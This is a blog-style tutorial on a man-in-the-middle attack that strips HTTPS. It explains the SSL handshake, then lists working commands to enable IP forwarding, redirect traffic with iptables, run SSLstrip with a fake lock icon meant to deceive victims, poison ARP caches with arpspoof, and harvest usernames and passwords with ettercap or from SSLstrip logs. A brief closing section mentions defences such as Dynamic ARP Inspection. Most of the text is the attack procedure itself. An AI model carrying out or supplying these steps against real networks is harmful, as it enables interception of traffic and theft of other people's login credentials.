Man-in-the-Middle (MitM) Attack + HTTPs strip

What is SSL and how it Works:

   SSL is a security protocol that provides an encrypted  tunnel between the client and the server . SSL uses a cryptographic algorithm that uses encrypts/decrypts data using the server’s public/private keys
SSL Handshake process:
SSL Handshake Steps

1. the client browser requests from the web server it’s identification

2. the server replies with a copy to its SSL certificate including the server’s public key

3. the browser checks the certificate in a list of trusted CAs, and that the certificate is unexpired , unrevoked , it’s name is valid, if the browser trusts the certificates it creates and sends to the server the session key (symmetric key) encrypted with the server’s public key.

4. server decrypts the symmetric session key and sends back to the client acknowledgement encrypted with the session key to start the encrypted session

5. server and client now encrypts all transmitted data using the symmetric session key



What is Man-in-the-Middle Attack:

 and sometimes is called Monkey-in-the-Middle attack , a type of attack when the attacker intercepts the traffic transmitted between the client and the server , copying the traffic trying to disclosure it’s contents. and forwarding it to the correct destination in order not to perform a denial of service (DoS) attack and thus not to make the victims be suspicious of the interception.

Attack Steps:

mentioned below the steps attacks from backbox linux distro , while you may use any linux flavour you want and install on it arpspoof, sslstrip and ettercap tools.

1. IP forwarding:

$ echo 1 > /proc/sys/net/ipv4/ip_forward

in case it didn’t accept the command try the below

$ sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"


user@bt:~$ sudo -i
root@bt:~# cat /proc/sys/net/ipv4/ip_forward
root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward 

2. redirecting traffic to port that SSLstrip listens to:

$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1234

3. running SSLstrip:

user@bt:/pentest/web/sslstrip$ sudo python -k -l 1234 -f lock.ico
  • -k: tells the system to kill all currently active sessions, forcing users to re-login to their websites.
  • -l: Listened Port
  • -f: add the https lock icon to deceive the client and let him thinks that connection is secured

4. ARP Spoofing (ARP Cache Poisoning) your network using arpspoof tool:

arpspoof -i <interface> -t <targetIP> <gatewayIP>

5. Running ethercap to catch the username and password clearly:

ettercap -Tq -i <interface>
  • T: runs ettercap in text mode
  • q: quite mode, It does not print packet content. It is useful if you want to convert pcap file to ettercap log files.

Or you get it from the SSLstrip logs as below:

 user@bt:~$ cat /pentest/web/sslstrip/sslstrip.log
2013-06-23 05:32:54,818 SECURE POST Data (
2013-06-23 05:32:57,997 SECURE POST Data (
2013-06-23 05:33:15,696 SECURE POST Data (
Or you can do a session hijacking using Hamster.

Defensive actions should be done by the security professional:

  • Dynamic ARP Inspection feature can be used to protect from ARP spoofing
  • make sure that the lock beside the url bar exists and it’s colour is green as shown below this will make you “slightly” sure that the connection is end-to-end (between client and server ) is encrypted.
    • Trusted Certificates example:


Green lock – trusted certificate – Mozilla website
Green lock – trusted certificate – Gmail
  • Bad Certificates example: in the following example MITM attack occurs , the traffic is encrypted between the victim and the client with a certificate issued by the attacker, he decrypts the traffic , compromise it , encrypts it again with the correct certificate (issued by the trusted CA) and finally sends it to the server.



Leave a Reply

Your email address will not be published.